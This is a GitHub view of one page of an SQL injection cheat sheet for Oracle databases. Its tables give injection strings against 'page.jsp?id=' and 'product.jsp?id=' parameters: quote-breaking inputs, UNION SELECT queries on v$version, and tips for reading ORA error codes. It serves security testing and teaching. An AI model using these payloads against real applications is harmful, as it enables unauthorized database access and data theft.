-
Notifications
You must be signed in to change notification settings - Fork 148
/
Copy pathoracle.html
64 lines (56 loc) · 2.21 KB
/
oracle.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
<h3 id="sql-injection-detection">DBMS Identification</h3>
<p class="pageDescription">{{site.data.injectionDescriptions.dbmsIdentification}}</p>
<p><i>Note: The comment characters <code> -- </code> are placed after the query to remove any commmands following our query, helping to prevent errors.</i></p>
<table class="table table-striped table-hover">
<thead>
<tr>
<th>Description</th>
<th>Query</th>
</tr>
</thead>
<tbody>
<tr>
<td>String concatenation</td>
<td>page.jsp?id='||'oracle' -- </td>
</tr>
<tr>
<td>Functions</td>
<td>BITAND(1,1) -- </td>
</tr>
<tr>
<td>Default table</td>
<td>page.jsp?id='UNION SELECT 1 FROM v$version -- </td>
</tr>
<tr>
<td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name.</i></td>
<td>page.jsp?id='</td>
</tr>
</tbody>
</table>
<h3 id="general-tips">General Tips</h3>
<p>Depending on the error provided by the application, if there is an “ORA-XXXX" error where each X is an integer, that means the database is Oracle</p>
<p>JSP applications generally have Oracle databases.</p>
<h3 id="sql-injection-types">Converting queries to injections</h3>
<p>Now that the injection has been identified, the rest of this guide will contain full queries. Use the methods below to insert those queries into your injection points. <code>SELECT banner FROM v$version</code> will be the example query.</p>
<table class="table table-striped table-hover">
<thead>
<tr>
<th>Description</th>
<th align="left">Query</th>
</tr>
</thead>
<tbody>
<tr>
<td>Union</td>
<td>product.jsp?id=' UNION SELECT banner FROM v$version -- </td>
</tr>
<tr>
<td>Union subquery</td>
<td>product.jsp?id=' UNION (SELECT banner FROM v$version) -- </td>
</tr>
<tr>
<td>Union null<br/><i>Note: If original query returns more than one column, add null to equal the number of columns-1</i></td>
<td>product.jsp?id=' UNION SELECT banner,null FROM v$version -- <br></td>
</tr>
</tbody>
</table>